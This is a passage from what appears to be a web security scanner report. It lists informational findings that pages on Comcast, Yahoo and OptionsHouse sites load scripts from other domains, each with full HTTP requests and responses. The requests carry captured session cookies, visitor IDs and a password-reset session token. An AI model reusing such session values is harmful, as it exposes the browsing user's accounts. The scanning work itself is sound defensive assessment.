<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js"> </script>
...[SNIP]...

16.20. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/780566

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/780566

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/780566 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/user/viewprofilepage/user-id/3616087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; LiSESSIONID=52B4547347B0428CE9D783866B22AFED; VISITORID=2086762009; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331799|PC#1315327839174-766376.19#1316539539|check#true#1315329999; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329907243'%255D%252C%255B'isp%252520email'%252C'1315329913981'%255D%255D%7C1473182713981%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331738091%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520customerguarantee%2520%7C1315331738106%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Disp%2520email%3B%20stc18%3Disp%2520email%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3Dcomcastsupportforumsdev%253D%252526pid%25253DComcast%25252520Help%25252520and%25252520Support%25252520Forums%25252FXfinity%25252520Central%25252FCustomer%25252520Service%25252FGamePass%25252520cancellation%25252520and%25252520e-mail%25252520response%25252520times%25252F%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%25252F%25252Fwww.comcast.com%25252FCorporate%25252FCustomers%25252FCustomerGuarantee.html%252526ot%25253DA%3B; fsr.s={"v":1,"pv":12,"lc":{"d0":{"v":12,"s":true,"e":2}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_cc=true; s_sq=comcastsupportforumsdev%3D%2526pid%253DComcast%252520Help%252520and%252520Support%252520Forums/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/78%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:25:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 118919
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js"> </script>
...[SNIP]...

16.21. http://forums.comcast.com/t5/user/viewprofilepage/user-id/3616087

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/user/viewprofilepage/user-id/3616087

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /t5/user/viewprofilepage/user-id/3616087 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; LiSESSIONID=52B4547347B0428CE9D783866B22AFED; VISITORID=2086762009; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331799|PC#1315327839174-766376.19#1316539539|check#true#1315329999; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329907243'%255D%252C%255B'isp%252520email'%252C'1315329913981'%255D%255D%7C1473182713981%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331738091%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520customerguarantee%2520%7C1315331738106%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Disp%2520email%3B%20stc18%3Disp%2520email%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3Dcomcastsupportforumsdev%253D%252526pid%25253DComcast%25252520Help%25252520and%25252520Support%25252520Forums%25252FXfinity%25252520Central%25252FCustomer%25252520Service%25252FGamePass%25252520cancellation%25252520and%25252520e-mail%25252520response%25252520times%25252F%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%25252F%25252Fwww.comcast.com%25252FCorporate%25252FCustomers%25252FCustomerGuarantee.html%252526ot%25253DA%3B; fsr.s={"v":1,"pv":12,"lc":{"d0":{"v":12,"s":true,"e":2}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_sq=comcastsupportforumsdev%3D%2526pid%253DComcast%252520Help%252520and%252520Support%252520Forums/Xfinity%252520Central/Customer%252520Service/GamePass%252520cancellation%252520and%252520e-mail%252520response%252520times/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.comcast.com/t5/user/viewprofilepage/user-id/3616087%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:25:44 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 50199
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="/
...[SNIP]...
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js"> </script>
...[SNIP]...

16.22. http://frontier.my.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE4Nzt9; expires=Fri, 06-Sep-2013 12:29:47 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:47 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MYFMP_Sacfea3=d=7142216504e66123b932767.54181906&s=6JRSdtjl3lb3w.8KyXWmOA--; expires=Mon, 05-Sep-2011 12:29:47 GMT; path=/; domain=frontier.my.yahoo.com; httponly
Set-Cookie: MYTMI=4; expires=Wed, 05-Sep-2012 12:29:47 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 171806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="ua-wk ua-win">
<head>
<script>var gTop = Number(new Date());</script> <script> </s
...[SNIP]...
</script><script type="text/javascript" src="http://l.yimg.com/a/lib/my/js/core_seed_0.0.6.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js">
</script>
...[SNIP]...

16.23. http://l.yimg.com/p/social_buttons/facebook-share-iframe.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /p/social_buttons/facebook-share-iframe.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /p/social_buttons/facebook-share-iframe.php?u=http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F&t=Red%20Hot%20Chili%20Peppers%20Exclusive%20Interview!%20New%20Album,%20New%20Member,%20New%20Video%20-%20Maximum%20Performance&l=Share&t_sec=mit_share&t_act=facebook HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:42 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=300, public
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 2374

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/3.1.1/build/cssreset/res
...[SNIP]...
</a>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

16.24. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /rate/395/yhofin/qbttn/stk_oldgb/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk HTTP/1.1
Host: landing.optionshouse.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602; domain=optionshouse.com; expires=Wed, 05-Sep-2012 05:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:14 GMT
Content-Length: 14053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head id="ball_page_ti
...[SNIP]...
<!--end js code for font substitution-->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...

16.25. https://login.comcast.net/myaccount/lookup

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/lookup

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1 HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/login?forceAuthn=1&continue=%2fSecure%2fHome.aspx&s=ccentral-cima&r=comcast.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:26 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=322
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 12359

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
   
   
   <title>Forgot your Comcast ID?</title>
   <link rel="stylesheet" type="text/css" href=
...[SNIP]...
<!-- Load jQuery from Google's CDN -->
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://www.google.com/recaptcha/api/challenge?k=6Lc6JwEAAAAAAAMsonray6oG09balZGZ2IONzjBx"></script>
...[SNIP]...

16.26. https://login.yahoo.com/config/login_verify2

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login_verify2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /config/login_verify2?.src=finance&.intl=us&.done=http://finance.yahoo.com/portfolios/ HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50181


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</script>
<script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script>
...[SNIP]...

16.27. http://maps.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _ygms=z^6&l^350%20Sansome%20Street%20San%20Francisco%20CA%2094104%20us&v^1&c^37.793676%7C-122.401025; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Expires: Wed, 16 Mar 1966 12:00:00 GMT
Cache-Control: must-revalidate
Pragma: no-cache
Set-Cookie: _ygms=z%5E6%26l%5E350+Sansome+Street+San+Francisco+CA+94104+us%26v%5E1%26c%5E37.793676%7C-122.401025; expires=Thu, 06-Oct-2011 12:44:56 GMT; path=/; domain=.maps.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18922

<html><head><title>Yahoo! Maps, Driving Directions, and Traffic</title><meta name="DESCRIPTION"content="Yahoo! Maps, Driving Directions, Satellite View and Traffic. Rated the best online mapping exper
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
</div><script type="text/javascript"
src="http://maps.yimg.com/fo/config_objects.php?ver=1.9.6.11&.lang=en-US&.region=us&.partner=">
</script><script type="text/javascript"src="http://l.yimg.com/a/i/us/map/aj/451/globalmaps-top-201006232158.js"></script>
...[SNIP]...

16.28. http://movies.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: movies.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:57 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.5
Content-Length: 143676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
   <head>
       <title>Yahoo! Movies: Read Movie Reviews, Find Showtimes and View Trail
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
</script><script src="http://ads.yimg.com/a/a/1-/jscodes/flash9/misc_9as2_20081114.js"></script>
...[SNIP]...
</SCRIPT><script src="http://ads.yimg.com/a/a/1-/jscodes/flash6/lrec_20081114.js"></script>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --> <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://l.yimg.com/a/lib/mov/mv_fp-min_1.6.js"></script>
       <script type="text/javascript" src="http://l.yimg.com/a/lib/mov/ymv_trending_now_search_1.3.js"></script>
...[SNIP]...

16.29. http://new.music.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 92265

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript" src="http://l.yimg.com/p/js/compressed/music_global_top_1.11.0.js"></script>
...[SNIP]...
</style>
<script type="text/javascript" language="javascript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/flash/swfobject/1.0/swfobject.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/tabview/tabview-min.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/p/combo?music/d/js/1314018381/mini/webplayerloader-onsite-min.js&music/d/js/concerts/1314018379/mini/concertsSummary.js"></script>
...[SNIP]...
</script>
   
<script type="text/javascript" src="http://l.yimg.com/p/js/compressed/music_global_bottom_1.13.0.js"></script>
...[SNIP]...

16.30. http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/ HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:34 GMT
